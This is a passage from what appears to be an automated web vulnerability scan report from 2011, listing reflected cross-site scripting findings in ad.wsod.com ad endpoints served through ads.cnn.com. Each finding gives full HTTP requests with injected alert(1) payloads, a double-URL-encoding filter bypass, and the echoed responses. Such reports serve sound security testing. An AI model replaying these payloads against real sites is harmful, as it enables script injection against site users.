P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2758

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
73,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357975bb"><script>alert(1)</script>2f4016cb7dd/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acece%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea48e62f48b4 was submitted in the REST URL parameter 3. This input was echoed as acece"><script>alert(1)</script>a48e62f48b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25acece%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea48e62f48b4/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2758

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25acece"><script>alert(1)</script>a48e62f48b4/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1c4c%2522%253balert%25281%2529%252f%252f978a12363d4 was submitted in the REST URL parameter 3. This input was echoed as b1c4c";alert(1)//978a12363d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25b1c4c%2522%253balert%25281%2529%252f%252f978a12363d4/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2713

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25b1c4c";alert(1)//978a12363d4/1300909350**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,859
...[SNIP]...

1.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51663"><script>alert(1)</script>a907b67cc6e was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=51663"><script>alert(1)</script>a907b67cc6e HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=51663"><script>alert(1)</script>a907b67cc6ehttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad949"-alert(1)-"84f02805fb6 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=ad949"-alert(1)-"84f02805fb6 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=ad949"-alert(1)-"84f02805fb6">
...[SNIP]...

1.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fab1"-alert(1)-"fd70bde4842 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055fab1"-alert(1)-"fd70bde4842&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055fab1"-alert(1)-"fd70bde4842&Values=1589&Redirect=">
...[SNIP]...

1.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Segments request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a0d"><script>alert(1)</script>5e178e073c4 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,4780512a0d"><script>alert(1)</script>5e178e073c4&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,4780512a0d"><script>alert(1)</script>5e178e073c4&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2998f"-alert(1)-"96971b52e93 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161692998f"-alert(1)-"96971b52e93&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909298**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161692998f"-alert(1)-"96971b52e93&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46
...[SNIP]...

1.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the TargetID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c446"><script>alert(1)</script>38fa1f7afbe was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161696c446"><script>alert(1)</script>38fa1f7afbe&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161696c446"><script>alert(1)</script>38fa1f7afbe&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46
...[SNIP]...

1.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e008b"-alert(1)-"3b15cc48a14 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589e008b"-alert(1)-"3b15cc48a14&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589e008b"-alert(1)-"3b15cc48a14&Redirect=">
...[SNIP]...

1.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Values request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afdd3"><script>alert(1)</script>184dd8f0960 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589afdd3"><script>alert(1)</script>184dd8f0960&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
